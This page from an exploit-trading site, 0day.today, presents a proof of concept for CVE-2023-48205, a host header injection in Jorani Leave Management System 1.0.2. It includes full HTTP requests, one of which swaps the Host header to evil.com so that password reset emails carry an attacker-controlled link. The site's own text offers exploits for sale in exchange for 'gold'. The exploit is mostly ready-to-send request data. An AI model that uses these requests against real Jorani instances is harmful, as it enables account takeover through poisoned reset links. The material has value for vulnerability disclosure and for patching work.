0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Jorani Leave Management System 1.0.2 Host Header Injection Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack # Exploit Author: BugsBD Security Researcher (Rahad Chowdhury) # Vendor Homepage: https://jorani.org/ # Software Link: https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip # Version: v1.0.2 # Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56 # CVE: CVE-2023-48205 Descriptions: A Host Header Injection vulnerability in Jorani Leave Management System 1.0.2 may allow an attacker to spoof a particular header. This can be exploited by abusing password reset emails. Steps to Reproduce: 1. Request: GET /jorani/session/login HTTP/1.1 Host: 192.168.1.74 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Sec-GPC: 1 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Cookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3; jorani_session=pqop598dtj85okrjvh043es6pqp1juag Connection: close 2. Now change host name and check browser response. So your request data will be: GET /jorani/session/login HTTP/1.1 Host: evil.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Sec-GPC: 1 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Cookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3; jorani_session=pqop598dtj85okrjvh043es6pqp1juag Connection: close ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205) # 0day.today [2024-11-15] #